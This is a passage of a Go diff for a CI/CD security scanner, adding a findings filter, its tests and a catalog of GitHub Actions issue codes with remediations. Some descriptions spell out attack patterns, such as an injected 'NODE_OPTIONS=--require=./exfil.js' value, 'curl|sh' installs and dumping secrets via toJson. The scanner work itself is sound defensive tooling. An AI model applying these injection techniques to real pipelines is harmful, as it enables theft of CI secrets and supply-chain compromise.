+ if len(disabled) == 0 {
+ return findings
+ }
+ out := make([]opaengine.Finding, 0, len(findings))
+ for _, f := range findings {
+ info := LookupCode(ErrorCode(f.Code))
+ if info != nil && info.ControlName != "" && disabled[info.ControlName] {
+ continue
+ }
+ out = append(out, f)
+ }
+ return out
+}
+
+// ApplyFindings fills in Compliance for each catalog entry based on
+// whether any finding matches its ControlName. The rule is binary: 100
+// when the control fires no finding (or is skipped), 0 otherwise.
+func ApplyFindings(entries []ControlEntry, findingsByControl map[string]int) []ControlEntry {
+ out := make([]ControlEntry, len(entries))
+ for i, e := range entries {
+ e.Compliance = 100.0
+ if !e.Skipped && findingsByControl[e.ControlName] > 0 {
+ e.Compliance = 0.0
+ }
+ out[i] = e
+ }
+ return out
+}
diff --git a/control/catalog_test.go b/control/catalog_test.go
new file mode 100644
index 0000000..61385a7
--- /dev/null
+++ b/control/catalog_test.go
@@ -0,0 +1,51 @@
+package control
+
+import (
+ "testing"
+
+ "github.com/getplumber/plumber/configuration"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+)
+
+func TestFilterFindingsByEnabledControls_dropsDisabledControlFindings(t *testing.T) {
+ disabled := false
+ enabled := true
+ pc := &configuration.PlumberConfig{
+ Controls: configuration.ControlsConfig{
+ ContainerImageMustNotUseForbiddenTags: &configuration.ImageForbiddenTagsControlConfig{
+ Enabled: &disabled,
+ },
+ BranchMustBeProtected: &configuration.BranchProtectionControlConfig{
+ Enabled: &enabled,
+ },
+ },
+ }
+
+ findings := []opaengine.Finding{
+ {Code: string(CodeImageNotPinnedByDigest), Severity: "high"},
+ {Code: string(CodeImageForbiddenTag), Severity: "medium"},
+ {Code: string(CodeBranchUnprotected), Severity: "critical"},
+ {Code: "ISSUE-9999", Severity: "low"}, // unknown, must be kept
+ }
+
+ out := FilterFindingsByEnabledControls(findings, pc)
+ if len(out) != 2 {
+ t.Fatalf("expected 2 findings, got %d: %+v", len(out), out)
+ }
+ for _, f := range out {
+ if f.Code == string(CodeImageNotPinnedByDigest) || f.Code == string(CodeImageForbiddenTag) {
+ t.Fatalf("disabled control finding leaked through: %+v", f)
+ }
+ }
+}
+
+func TestFilterFindingsByEnabledControls_noConfigKeepsAll(t *testing.T) {
+ findings := []opaengine.Finding{
+ {Code: string(CodeImageNotPinnedByDigest), Severity: "high"},
+ {Code: string(CodeBranchUnprotected), Severity: "critical"},
+ }
+ out := FilterFindingsByEnabledControls(findings, nil)
+ if len(out) != len(findings) {
+ t.Fatalf("expected all findings preserved when pc is nil, got %d", len(out))
+ }
+}
diff --git a/control/codes.go b/control/codes.go
index e051642..da39a25 100644
--- a/control/codes.go
+++ b/control/codes.go
@@ -25,6 +25,30 @@ const (
CodeImageForbiddenTag ErrorCode = "ISSUE-102"
// ISSUE-103: Container image is not pinned by digest
CodeImageNotPinnedByDigest ErrorCode = "ISSUE-103"
+ // ISSUE-104: Third-party GitHub Action reference is not pinned by commit SHA
+ CodeActionUnpinned ErrorCode = "ISSUE-104"
+ // ISSUE-105: Container registry password is hard-coded in the workflow
+ CodeContainerHardcodedCredentials ErrorCode = "ISSUE-105"
+ // ISSUE-106: Release/publish workflow primes a build cache from attacker-controlled artifacts
+ CodeCachePoisoning ErrorCode = "ISSUE-106"
+ // ISSUE-108: Action is hosted in an archived GitHub repository
+ CodeActionArchivedRepo ErrorCode = "ISSUE-108"
+ // ISSUE-109: Pinned commit SHA does not exist in the action's upstream repository
+ CodeImpostorCommit ErrorCode = "ISSUE-109"
+ // ISSUE-110: `# vX.Y.Z` comment does not match the SHA the ref resolves to
+ CodeRefVersionMismatch ErrorCode = "ISSUE-110"
+ // ISSUE-111: Action pinned by SHA is stale vs the latest upstream release
+ CodeStaleActionRef ErrorCode = "ISSUE-111"
+ // ISSUE-113: Symbolic ref collides with both a tag and a branch upstream
+ CodeRefConfusion ErrorCode = "ISSUE-113"
+ // ISSUE-114: Action version carries a published security advisory
+ CodeKnownVulnerableAction ErrorCode = "ISSUE-114"
+ // ISSUE-115: Third-party action duplicates a runner built-in (gh CLI, etc.)
+ CodeSuperfluousAction ErrorCode = "ISSUE-115"
+ // ISSUE-107: Dockerfile FROM reference is not pinned by digest
+ CodeDockerfileUnpinnedBase ErrorCode = "ISSUE-107"
+ // ISSUE-112: Release / publish workflow produces unsigned artefacts
+ CodeReleaseWorkflowUnsigned ErrorCode = "ISSUE-112"
)
// Issue codes for CI/CD variable controls (2xx)
@@ -35,6 +59,44 @@ const (
CodeUnsafeVariableExpansion ErrorCode = "ISSUE-204"
// ISSUE-205: A variable that should only be set in CI/CD Settings is overridden in the pipeline config
CodeJobVariableOverridden ErrorCode = "ISSUE-205"
+ // ISSUE-206: Workflow inlines user-controlled template expressions into a run: script
+ CodeTemplateInjection ErrorCode = "ISSUE-206"
+ // ISSUE-208: Workflow re-enables deprecated GitHub Actions workflow commands
+ CodeInsecureCommands ErrorCode = "ISSUE-208"
+ // ISSUE-209: Workflow writes untrusted content to $GITHUB_ENV or $GITHUB_PATH
+ CodeGitHubEnvInjection ErrorCode = "ISSUE-209"
+ // ISSUE-210: Workflow gates behaviour on a spoofable actor/bot check
+ CodeBotConditions ErrorCode = "ISSUE-210"
+ // ISSUE-211: Workflow `if:` condition is logically unsound (always true/false, tautology)
+ CodeUnsoundCondition ErrorCode = "ISSUE-211"
+ // ISSUE-212: Workflow misuses the `contains()` built-in (argument order, type)
+ CodeUnsoundContains ErrorCode = "ISSUE-212"
+ // ISSUE-215: Workflow expands a `vars.*` template into a shell script
+ CodeTemplateInjectionVars ErrorCode = "ISSUE-215"
+ // ISSUE-213: Workflow exports the whole `github` context via toJson(github)
+ CodeUnsafeGithubContextDump ErrorCode = "ISSUE-213"
+ // ISSUE-214: Workflow installs a package without pinning a version / lockfile
+ CodeUnpinnedPackageInstall ErrorCode = "ISSUE-214"
+)
+
+// Issue codes for secret and credential handling controls (3xx)
+const (
+ // ISSUE-301: Workflow exfiltrates the entire secrets context via toJson(secrets)
+ CodeOverprovisionedSecrets ErrorCode = "ISSUE-301"
+ // ISSUE-302: Reusable workflow called with `secrets: inherit`
+ CodeSecretsInherit ErrorCode = "ISSUE-302"
+ // ISSUE-303: Secret dereferenced via fromJSON bypasses log redaction
+ CodeUnredactedSecrets ErrorCode = "ISSUE-303"
+ // ISSUE-304: Workflow grants no explicit permissions, relying on the repo default
+ CodeUndocumentedPermissions ErrorCode = "ISSUE-304"
+ // ISSUE-305: Secret used without an environment gate
+ CodeSecretsOutsideEnv ErrorCode = "ISSUE-305"
+ // ISSUE-306: GitHub App token issued with revocation disabled
+ CodeGitHubAppSkipRevoke ErrorCode = "ISSUE-306"
+ // ISSUE-307: Checkout persists credentials in .git/config (artipacked)
+ CodeArtipacked ErrorCode = "ISSUE-307"
+ // ISSUE-308: Workflow reads a secret via a dynamic index (secrets[expr])
+ CodeSecretsDynamicIndex ErrorCode = "ISSUE-308"
)
// Issue codes for pipeline composition controls (4xx)
@@ -61,6 +123,34 @@ const (
CodeDockerInDockerUsage ErrorCode = "ISSUE-412"
// ISSUE-413: CI/CD job uses Docker-in-Docker with insecure daemon configuration
CodeDockerInDockerInsecure ErrorCode = "ISSUE-413"
+ // ISSUE-414: Workflow subscribes to a dangerous trigger (pull_request_target, workflow_run)
+ CodeDangerousTriggers ErrorCode = "ISSUE-414"
+ // ISSUE-415: pull_request_target workflow explicitly checks out the PR head (tj-actions pattern)
+ CodePullRequestTargetWithHeadCheckout ErrorCode = "ISSUE-415"
+)
+
+// Issue codes for workflow-hygiene controls (6xx)
+const (
+ // ISSUE-601: Workflow has no explicit `name:` field
+ CodeAnonymousDefinition ErrorCode = "ISSUE-601"
+ // ISSUE-602: Workflow has no `concurrency:` block at either level
+ CodeMissingConcurrency ErrorCode = "ISSUE-602"
+ // ISSUE-603: Workflow uses a misfeature pattern (shell: cmd, inline pip install curl|sh, β¦)
+ CodeWorkflowMisfeature ErrorCode = "ISSUE-603"
+ // ISSUE-604: Workflow script contains obfuscation (zero-width / non-ASCII unicode, bidi)
+ CodeWorkflowObfuscation ErrorCode = "ISSUE-604"
+ // ISSUE-605: PyPI / npm publish relies on a static token instead of OIDC trusted publishing
+ CodeUseTrustedPublishing ErrorCode = "ISSUE-605"
+ // ISSUE-606: dependabot.yml re-enables insecure external code execution
+ CodeDependabotInsecureExec ErrorCode = "ISSUE-606"
+ // ISSUE-607: dependabot.yml update ecosystem has no cooldown window
+ CodeDependabotMissingCooldown ErrorCode = "ISSUE-607"
+ // ISSUE-608: Repository has workflows but no dependency update tool configured
+ CodeDependencyUpdateToolMissing ErrorCode = "ISSUE-608"
+ // ISSUE-609: Repository has workflows but none runs a SAST scanner
+ CodeSASTWorkflowMissing ErrorCode = "ISSUE-609"
+ // ISSUE-610: Repository has workflows but no SECURITY.md policy file
+ CodeSecurityPolicyMissing ErrorCode = "ISSUE-610"
)
// Issue codes for access and authorization controls (5xx)
@@ -69,6 +159,8 @@ const (
CodeBranchUnprotected ErrorCode = "ISSUE-501"
// ISSUE-505: Branch has non-compliant protection settings
CodeBranchNonCompliant ErrorCode = "ISSUE-505"
+ // ISSUE-509: Job runs with overly broad permissions (write-all)
+ CodeExcessivePermissions ErrorCode = "ISSUE-509"
)
// ErrorCodeInfo provides metadata about an issue code.
@@ -119,6 +211,114 @@ var errorCodeRegistry = map[ErrorCode]ErrorCodeInfo{
DocURL: docsBaseURL + string(CodeImageNotPinnedByDigest),
ControlName: "containerImageMustNotUseForbiddenTags",
},
+ CodeActionUnpinned: {
+ Code: CodeActionUnpinned,
+ Severity: SeverityHigh,
+ Title: "Third-party action reference is not pinned by commit SHA",
+ Description: "A GitHub Actions workflow references a third-party action with a mutable ref (tag or branch) instead of a 40-character commit SHA. Tag and branch refs can be reassigned by the action's maintainer β or by an attacker who compromises the action's repository β to point at arbitrary code, which then runs inside the caller workflow with its secrets. The March 2025 tj-actions/changed-files compromise (CVE-2025-30066) propagated this way to hundreds of repositories, including aquasecurity/trivy.",
+ Remediation: "Replace `uses: owner/action@v4` with `uses: owner/action@<40-char-sha>` and add a `# vX.Y.Z` comment to document the version. Tools like Dependabot's `version-update-strategy: sha-and-version` can automate the update flow. Official GitHub-owned actions (actions/*, github/*) can be excluded if they are in the workflow's trusted boundary.",
+ DocURL: docsBaseURL + string(CodeActionUnpinned),
+ ControlName: "actionsMustBePinnedByCommitSha",
+ },
+ CodeCachePoisoning: {
+ Code: CodeCachePoisoning,
+ Severity: SeverityHigh,
+ Title: "Release/publish workflow may consume a poisoned build cache",
+ Description: "A release, tag or publish workflow uses `actions/cache@*` (or an equivalent cache action) without scoping the cache key to the ref being released. Caches on GitHub Actions are shared across branches according to the fallback rules: a malicious PR run on a feature branch can populate the same cache key that the release job later restores, silently injecting compiled artefacts, dependencies, or build scripts into the published output. Past supply-chain incidents have abused exactly this fallback to publish compromised packages to PyPI and npm.",
+ Remediation: "Either disable the cache entirely on release/publish jobs, or scope the `key:` to the ref being released (e.g. `key: release-${{ github.ref_name }}-${{ hashFiles('**/go.sum') }}`) without a `restore-keys:` fallback that reaches into PR-populated entries. Verify artefacts against a checksum after restoring.",
+ DocURL: docsBaseURL + string(CodeCachePoisoning),
+ ControlName: "releaseWorkflowsMustNotRestoreUntrustedCache",
+ },
+ CodeActionArchivedRepo: {
+ Code: CodeActionArchivedRepo,
+ Severity: SeverityHigh,
+ Title: "Action is hosted in an archived repository",
+ Description: "A GitHub Actions workflow references an action whose upstream repository is archived. Archived repos no longer receive maintenance β security fixes, dependency bumps, compatibility patches all stop β and any existing vulnerability stays open forever. A new SHA can still be pushed by the last maintainer, so even pinning by SHA does not make the reference safe against a future takeover.",
+ Remediation: "Replace the action with a maintained fork (audit the fork's owner first) or with an equivalent step implemented inline. If the behaviour is trivial, inlining the shell logic avoids the supply-chain dependency entirely.",
+ DocURL: docsBaseURL + string(CodeActionArchivedRepo),
+ ControlName: "actionsMustNotBeArchived",
+ },
+ CodeImpostorCommit: {
+ Code: CodeImpostorCommit,
+ Severity: SeverityCritical,
+ Title: "Pinned commit SHA does not belong to the action's repository",
+ Description: "A workflow pins an action to a commit SHA that does not resolve in the action's upstream repository. That means either the SHA was mistyped (the reference silently runs whatever tag/branch GitHub falls back to, typically the default branch) or β far worse β the author was tricked by a PR comment / stargazer dashboard showing a detached commit that was never merged upstream. The name-and-SHA combination is the precise form of the `impostor commit` attack documented in academic supply-chain literature.",
+ Remediation: "Replace the reference with a SHA that actually belongs to the action's repository. Use `gh api repos///commits/` to verify before committing the change.",
+ DocURL: docsBaseURL + string(CodeImpostorCommit),
+ ControlName: "actionRefsMustExistUpstream",
+ },
+ CodeRefVersionMismatch: {
+ Code: CodeRefVersionMismatch,
+ Severity: SeverityMedium,
+ Title: "`# vX.Y.Z` comment does not match the SHA",
+ Description: "A workflow pins an action by commit SHA and adds a trailing `# vX.Y.Z` comment to document the intended version, but the SHA does not correspond to the tag named in the comment. Reviewers scanning diffs trust that annotation and miss the discrepancy, so silent downgrades (or upgrades that claim to be a patch) slip through review unnoticed.",
+ Remediation: "Either update the SHA to the one the tag points at, or update the comment to the tag that actually corresponds to the SHA. `gh api repos///git/ref/tags/` returns the SHA the tag resolves to.",
+ DocURL: docsBaseURL + string(CodeRefVersionMismatch),
+ ControlName: "actionPinCommentsMustMatchSha",
+ },
+ CodeStaleActionRef: {
+ Code: CodeStaleActionRef,
+ Severity: SeverityLow,
+ Title: "Action pin is behind the latest upstream release",
+ Description: "A workflow pins an action to a commit SHA that predates the repository's most recent release. The SHA may still work today, but it is missing security fixes, dependency updates, and runtime compatibility changes shipped in later releases. Dependabot's `version-update-strategy: sha-and-version` handles the upgrade loop once configured.",
+ Remediation: "Update the pin to the SHA of the latest release, and refresh the trailing `# vX.Y.Z` comment. Enable Dependabot with `package-ecosystem: github-actions` and `version-update-strategy: sha-and-version` to keep the pins fresh automatically.",
+ DocURL: docsBaseURL + string(CodeStaleActionRef),
+ ControlName: "actionPinsMustNotBeStale",
+ },
+ CodeRefConfusion: {
+ Code: CodeRefConfusion,
+ Severity: SeverityMedium,
+ Title: "Action ref name collides with both a tag and a branch",
+ Description: "A workflow pins an action to a name that exists upstream **as both a tag and a branch** (classic case: a tag `v1` kept in parallel with a branch `v1`). GitHub Actions resolves tags first, so today the workflow runs the tagged commit β but a maintainer rename, a pipeline typo, or a CI parameter that drops a character can switch the binding to the branch, which tracks every push. The ambiguity makes the reference fundamentally unreliable: the reviewer cannot tell from the YAML alone which of the two upstream revisions will execute.",
+ Remediation: "Replace the ambiguous name with either a 40-character commit SHA (preferred) or a suffix that disambiguates (`refs/tags/v1` vs `refs/heads/v1`). Ask the action maintainer to remove one of the two refs; keeping both is a supply-chain landmine for every caller.",
+ DocURL: docsBaseURL + string(CodeRefConfusion),
+ ControlName: "actionRefsMustNotCollide",
+ },
+ CodeKnownVulnerableAction: {
+ Code: CodeKnownVulnerableAction,
+ Severity: SeverityCritical,
+ Title: "Action version carries a published security advisory",
+ Description: "The pinned version of this action appears in the GitHub Advisory Database under the `actions` ecosystem. Running a workflow on a known-vulnerable action version inherits the published vulnerability class (RCE, secret exfiltration, privilege escalation, depending on the advisory). Examples from history: tj-actions/changed-files (CVE-2025-30066), reviewdog/action-setup with the March 2025 compromise, unpatched releases of `actions/artifact`. This check reports every advisory whose affected-version range covers the pinned ref.",
+ Remediation: "Upgrade the action to a version outside the advisory's affected range (the advisory page lists a fixed-in version). Pin by SHA once upgraded so future retags cannot silently revert the fix. Configure Dependabot with `package-ecosystem: github-actions` to receive PR alerts when new advisories land.",
+ DocURL: docsBaseURL + string(CodeKnownVulnerableAction),
+ ControlName: "actionsMustNotCarryKnownCVEs",
+ },
+ CodeDockerfileUnpinnedBase: {
+ Code: CodeDockerfileUnpinnedBase,
+ Severity: SeverityMedium,
+ Title: "Dockerfile FROM reference is not pinned by digest",
+ Description: "A Dockerfile at the root of the repository (or under a known build directory) uses `FROM image:tag` without a `@sha256:β¦` digest. Tags are mutable at the registry level: an attacker who compromises the registry β or the image maintainer β can re-push the same tag to point at a different layer, silently injecting code into every later build that pulls the reference. The supply chain of the downstream artefact then inherits that substitution. Pinning by digest is the single control that neutralises this vector.",
+ Remediation: "Replace `FROM image:tag` with `FROM image:tag@sha256:β¦`. `docker inspect --format='{{index .RepoDigests 0}}' image:tag` prints the digest for the tag you just pulled. Automate refresh with Dependabot or Renovate (`package-ecosystem: docker`, `version-update-strategy: sha-and-version`) so the pin stays current.",
+ DocURL: docsBaseURL + string(CodeDockerfileUnpinnedBase),
+ ControlName: "dockerfilesMustPinBaseImageByDigest",
+ },
+ CodeReleaseWorkflowUnsigned: {
+ Code: CodeReleaseWorkflowUnsigned,
+ Severity: SeverityMedium,
+ Title: "Release / publish workflow produces unsigned artefacts",
+ Description: "A workflow runs a release or publish action (goreleaser, softprops/action-gh-release, pypa publish, npm-publish, docker build+push) without invoking any signing step. Consumers pulling the released artefact have no cryptographic handle to verify the artefact was built by the expected pipeline rather than tampered with along the way (cache poisoning, compromised runner, repository takeover). Signing (Sigstore cosign, GPG, SLSA provenance) turns 'I trust this came from that repo' into a falsifiable statement.",
+ Remediation: "Add a signing step to the release job: `sigstore/cosign-installer` followed by `cosign sign ` for container images, `sigstore/gh-action-sigstore-python` for Python wheels, `crazy-max/ghaction-import-gpg` + `gpg --detach-sign` for tarballs, or `--snapshot-github-actions` on goreleaser with the signing pipeline configured. Publish the `.sig` / `.asc` alongside the artefact in the release assets.",
+ DocURL: docsBaseURL + string(CodeReleaseWorkflowUnsigned),
+ ControlName: "releaseWorkflowsMustSignArtefacts",
+ },
+ CodeSuperfluousAction: {
+ Code: CodeSuperfluousAction,
+ Severity: SeverityLow,
+ Title: "Third-party action duplicates functionality already on the runner",
+ Description: "A workflow uses a third-party action to do something the GitHub-hosted runner already provides out of the box: `gh` CLI operations wrapped by `peter-evans/create-pull-request`, basic cache operations that `actions/cache` already covers, `nick-invision/retry` for a one-line `bash` retry loop. Each extra action is an extra supply-chain dependency for zero capability gain β the sort of reference where an `impostor-commit`, a tag retag, or a compromise of the upstream account buys the attacker a foothold with no functional reason to have taken that risk.",
+ Remediation: "Replace the action with the equivalent inline shell step using the runner's built-in tooling (`gh pr create`, `gh release`, simple `bash` retry loops). Keeps the workflow readable AND removes a supply-chain link. When the capability is non-trivial (artifact caching, matrix fan-out), prefer the official `actions/*` action over a third-party duplicate.",
+ DocURL: docsBaseURL + string(CodeSuperfluousAction),
+ ControlName: "actionsMustNotDuplicateRunnerBuiltins",
+ },
+ CodeContainerHardcodedCredentials: {
+ Code: CodeContainerHardcodedCredentials,
+ Severity: SeverityCritical,
+ Title: "Container registry password is hard-coded in the workflow",
+ Description: "A GitHub Actions workflow sets `jobs..container.credentials.password` to a literal string instead of a `${{ secrets.X }}` reference. The password is committed to the repository's history in plain text; anyone with read access β including the entire public on a public repo β can retrieve it, and rotating it requires rewriting history to purge the leak.",
+ Remediation: "Store the password in a repository, environment, or organization secret and reference it via `${{ secrets. }}`. If the password is already exposed in git history, rotate it immediately and purge the literal with `git filter-repo` or a BFG run before re-publishing.",
+ DocURL: docsBaseURL + string(CodeContainerHardcodedCredentials),
+ ControlName: "containerCredentialsMustComeFromSecrets",
+ },
// CI/CD variable controls (2xx)
CodeDebugTraceEnabled: {
@@ -270,6 +470,276 @@ var errorCodeRegistry = map[ErrorCode]ErrorCodeInfo{
DocURL: docsBaseURL + string(CodeBranchNonCompliant),
ControlName: "branchMustBeProtected",
},
+ CodeTemplateInjection: {
+ Code: CodeTemplateInjection,
+ Severity: SeverityCritical,
+ Title: "Template injection in workflow script",
+ Description: "A GitHub Actions workflow inlines user-controlled template expressions (github.event.*, github.head_ref, ...) directly into a `run:` shell script. Attacker-controlled values such as PR titles, issue bodies or fork branch names can break out of the intended string and execute arbitrary commands with the job's secrets.",
+ Remediation: "Move the template expression into an `env:` binding first, then reference the environment variable from the shell (`\"$TITLE\"`). Shell expansion of a bound variable quotes the value and neutralises injection payloads.",
+ DocURL: docsBaseURL + string(CodeTemplateInjection),
+ ControlName: "workflowMustNotInjectUserInputInScripts",
+ },
+ CodeInsecureCommands: {
+ Code: CodeInsecureCommands,
+ Severity: SeverityHigh,
+ Title: "Deprecated workflow commands re-enabled",
+ Description: "A GitHub Actions job re-enables the deprecated `::set-env::` / `::add-path::` workflow commands via ACTIONS_ALLOW_UNSECURE_COMMANDS. Those commands were disabled after CVE-2020-15228 because attacker-controlled log output can rewrite the running job's environment and PATH.",
+ Remediation: "Remove the `ACTIONS_ALLOW_UNSECURE_COMMANDS` environment variable. Use the `$GITHUB_ENV` and `$GITHUB_PATH` files explicitly when you need to propagate values, and validate any untrusted content before writing to them.",
+ DocURL: docsBaseURL + string(CodeInsecureCommands),
+ ControlName: "workflowMustNotReEnableInsecureCommands",
+ },
+ CodeBotConditions: {
+ Code: CodeBotConditions,
+ Severity: SeverityHigh,
+ Title: "Workflow gates behaviour on a spoofable actor/bot check",
+ Description: "A GitHub Actions workflow gates behaviour on `github.actor`, `github.triggering_actor` or equivalent identity strings (`dependabot[bot]`, `renovate[bot]`, a specific username) without cryptographic backing. Those values are filled from whoever opened or synchronised the PR β an attacker can open a fork PR using a crafted username, or in some trigger types the `actor` field reflects the fork author, not the verified bot. Any step that trusts such a check (`if: github.actor == 'dependabot[bot]'`) can be bypassed by a malicious contributor forging the right login.",
+ Remediation: "Never grant elevated behaviour based on `github.actor` / `github.triggering_actor` alone. For Dependabot-specific flows use the `pull_request` event with a separate privileged workflow triggered by `pull_request_target` only after a manual review, or rely on branch protections. For bots, verify the commit signature/author via git rather than the GitHub actor string.",
+ DocURL: docsBaseURL + string(CodeBotConditions),
+ ControlName: "workflowMustNotTrustSpoofableActorChecks",
+ },
+ CodeUnsoundCondition: {
+ Code: CodeUnsoundCondition,
+ Severity: SeverityMedium,
+ Title: "Unsound `if:` condition (tautology, contradiction, or missing ${{ }})",
+ Description: "A GitHub Actions `if:` expression contains a pattern that cannot be evaluated as intended: a tautology (`always() || ...`, `true == true`), a contradiction (`false && anything`), or a bare boolean string that is not wrapped in `${{ }}` (GitHub parses it as the literal string \"true\" / \"false\", which is always truthy). The gate the author thought they installed is not actually there β the step/job runs unconditionally (or never), usually silently.",
+ Remediation: "Review the condition: remove dead branches (`always()` short-circuits OR), wrap every template expression in `${{ β¦ }}`, and prefer simple comparisons over nested constructs. For debugging, `if: ${{ github.event_name == 'push' }}` is safer than `if: github.event_name == 'push'` which often parses as the literal string.",
+ DocURL: docsBaseURL + string(CodeUnsoundCondition),
+ ControlName: "workflowConditionsMustBeSound",
+ },
+ CodeUnsoundContains: {
+ Code: CodeUnsoundContains,
+ Severity: SeverityMedium,
+ Title: "`contains()` built-in misused (argument order or type)",
+ Description: "A GitHub Actions expression calls `contains()` with arguments in the wrong order or of incompatible types. The signature is `contains(haystack, needle)`: passing a single string as the first argument and a whole expression as the second inverts the semantics and the gate never matches the intended case. A common failure mode is `contains('main', github.ref)` β the literal `'main'` does not contain the full ref `refs/heads/main`, so the check always fails even on the `main` branch.",
+ Remediation: "Use `contains(github.ref, 'refs/heads/main')` β the ref is the haystack, the branch name is the needle. For filter lists, convert to a set: `contains(fromJSON('[\"main\", \"release\"]'), github.ref_name)` makes the intent explicit.",
+ DocURL: docsBaseURL + string(CodeUnsoundContains),
+ ControlName: "workflowContainsCallsMustBeSound",
+ },
+ CodeUnsafeGithubContextDump: {
+ Code: CodeUnsafeGithubContextDump,
+ Severity: SeverityHigh,
+ Title: "Entire `github` context serialised with toJson(github)",
+ Description: "A `run:` step, env binding or action input serialises the whole `github` context (or `github.event`) with `toJson(...)`. The resulting JSON carries every user-controllable field GitHub exposes β PR title, issue body, fork branch name, commit message β bundled with metadata the workflow might otherwise believe is trusted. Any downstream consumer (log line, third-party action, HTTP header) then sees a payload that is trivially shell-injectable under a privileged trigger (`pull_request_target`, `workflow_run`). Same risk class as ISSUE-206 template-injection, but the dump form is worse: a single `echo $JSON` leaks the full attack surface rather than one field.",
+ Remediation: "Never pass the `github` context whole. Extract the exact fields you need into named `env:` bindings first (`env: { PR_TITLE: ${{ github.event.pull_request.title }} }`), then reference the environment variable from the shell β expansion quotes the value automatically. If the downstream tool genuinely requires JSON, build it explicitly from the named fields with `jq -n --arg title \"$PR_TITLE\" '{title: $title}'`.",
+ DocURL: docsBaseURL + string(CodeUnsafeGithubContextDump),
+ ControlName: "workflowMustNotExportEntireGitHubContext",
+ },
+ CodeUnpinnedPackageInstall: {
+ Code: CodeUnpinnedPackageInstall,
+ Severity: SeverityMedium,
+ Title: "Package installed without a pinned version or lockfile",
+ Description: "A `run:` step invokes `pip install PKG` or `npm install PKG` without a pinned version (`pip install pkg==1.2.3`, `npm install pkg@1.2.3`) and without a lockfile install (`pip install -r requirements.txt`, `npm ci`). Every run then resolves whatever is latest on the registry at execution time β a window exploited repeatedly by typosquat and maintainer-account compromise attacks. Lockfiles (`package-lock.json`, `poetry.lock`, `pdm.lock`, β¦) combined with `npm ci` / `pip install -r requirements.txt --require-hashes` turn every run into a reproducible, verifiable install.",
+ Remediation: "Replace `pip install pkg` with `pip install -r requirements.txt` (with hashes generated via `pip-compile --generate-hashes`) or pin every package explicitly: `pip install 'pkg==1.2.3'`. Replace `npm install pkg` with `npm ci` once the lockfile is committed. Enable Dependabot or Renovate on the locked manifest so upgrades still flow, reviewed, rather than silently.",
+ DocURL: docsBaseURL + string(CodeUnpinnedPackageInstall),
+ ControlName: "workflowMustPinPackageInstalls",
+ },
+ CodeTemplateInjectionVars: {
+ Code: CodeTemplateInjectionVars,
+ Severity: SeverityLow,
+ Title: "Maintainer-adjacent template (`vars.*` or `inputs.*`) expanded into a shell script",
+ Description: "A `run:` step inlines a `${{ vars.X }}` or `${{ inputs.X }}` expression directly into the shell command. `vars` values come from repository / organisation / environment variables set by maintainers; `inputs` values come from the caller of a reusable workflow. Neither is PR-author-controlled by default (ISSUE-206 covers that case), but both flip to attacker-controlled under specific conditions: a compromised maintainer account, a misconfigured org-level variable, or a caller workflow that proxies `github.event.*` into a reusable-workflow input. The canonical remediation is identical to ISSUE-206: bind the value through `env:` first, then reference the environment variable from the shell so expansion quotes it automatically.",
+ Remediation: "Replace `${{ vars.X }}` / `${{ inputs.X }}` in the `run:` body with an `env:` binding plus `$X` dereference. Example: `env: { REGISTRY: ${{ vars.REGISTRY }} }` at the step, then `docker login \"$REGISTRY\"` in the script.",
+ DocURL: docsBaseURL + string(CodeTemplateInjectionVars),
+ ControlName: "workflowMustNotInjectVarsInScripts",
+ },
+ CodeGitHubEnvInjection: {
+ Code: CodeGitHubEnvInjection,
+ Severity: SeverityCritical,
+ Title: "Untrusted content written to $GITHUB_ENV or $GITHUB_PATH",
+ Description: "A GitHub Actions `run:` step appends a user-controlled value (PR title, issue body, fork branch name, ...) to `$GITHUB_ENV` or `$GITHUB_PATH`. The appended value becomes an environment variable or PATH entry for every subsequent step in the job. An attacker who controls the value can override existing variables (for example `NODE_OPTIONS=--require=./exfil.js`) or inject a malicious directory at the front of PATH, hijacking any later `npm`, `bash`, etc. invocation and exfiltrating secrets from privileged triggers.",
+ Remediation: "Do not write user-controlled values into `$GITHUB_ENV` or `$GITHUB_PATH`. If you must propagate a value derived from user input, bind it through an `env:` block first (`env: { TITLE: ${{ github.event.issue.title }} }`) and validate/escape it before writing β or pass it as a step output instead. Restrict workflows touching these files to non-PR triggers when possible.",
+ DocURL: docsBaseURL + string(CodeGitHubEnvInjection),
+ ControlName: "workflowMustNotWriteUntrustedContentToGitHubEnv",
+ },
+ CodeArtipacked: {
+ Code: CodeArtipacked,
+ Severity: SeverityHigh,
+ Title: "Checkout persists credentials in .git/config",
+ Description: "A GitHub Actions job runs `actions/checkout` without disabling credential persistence. By default the action writes GITHUB_TOKEN into the cloned repository's .git/config. Any subsequent step that uploads `.git` as part of an artifact, or executes fork-controlled code, can exfiltrate the token.",
+ Remediation: "Add `with: { persist-credentials: false }` on every `uses: actions/checkout@*` step unless the job legitimately needs to push back. When push is required, scope the token with an explicit `permissions:` block.",
+ DocURL: docsBaseURL + string(CodeArtipacked),
+ ControlName: "checkoutMustNotPersistCredentials",
+ },
+ CodeUnredactedSecrets: {
+ Code: CodeUnredactedSecrets,
+ Severity: SeverityHigh,
+ Title: "Secret dereferenced via fromJSON bypasses log redaction",
+ Description: "A GitHub Actions workflow dereferences a secret value with `fromJSON(secrets.X).y` β once fromJSON parses the secret, the inner fields are fresh strings GitHub does not recognise as masked values. Anything that echoes the sub-field (print, log, HTTP header, error message) leaks the plaintext to the job log.",
+ Remediation: "Pass structured secrets through `env:` bindings that reference each leaf individually (`env: { API_KEY: ${{ secrets.MY_API_KEY }} }`) so log redaction keeps working. If a JSON blob must be split, do it inside a step that never echoes the result and writes only the necessary parts back to the environment.",
+ DocURL: docsBaseURL + string(CodeUnredactedSecrets),
+ ControlName: "workflowMustNotUnredactSecretsViaFromJSON",
+ },
+ CodeUndocumentedPermissions: {
+ Code: CodeUndocumentedPermissions,
+ Severity: SeverityMedium,
+ Title: "Workflow has no explicit `permissions:` block",
+ Description: "A GitHub Actions workflow declares neither a workflow-level nor per-job `permissions:` block. The runner then falls back to the repository-wide default GITHUB_TOKEN permissions β often `contents: write` or `read-all` β giving every step more authority than it needs. Any compromise (unpinned action, template-injection, cache poisoning) inherits the full default scope.",
+ Remediation: "Declare the narrowest permissions explicitly: `permissions: { contents: read }` at the workflow level and widen per-job only when a step needs to push, comment on issues, etc. This enforces the principle of least privilege regardless of the repo default setting.",
+ DocURL: docsBaseURL + string(CodeUndocumentedPermissions),
+ ControlName: "workflowsMustDeclarePermissions",
+ },
+ CodeSecretsDynamicIndex: {
+ Code: CodeSecretsDynamicIndex,
+ Severity: SeverityLow,
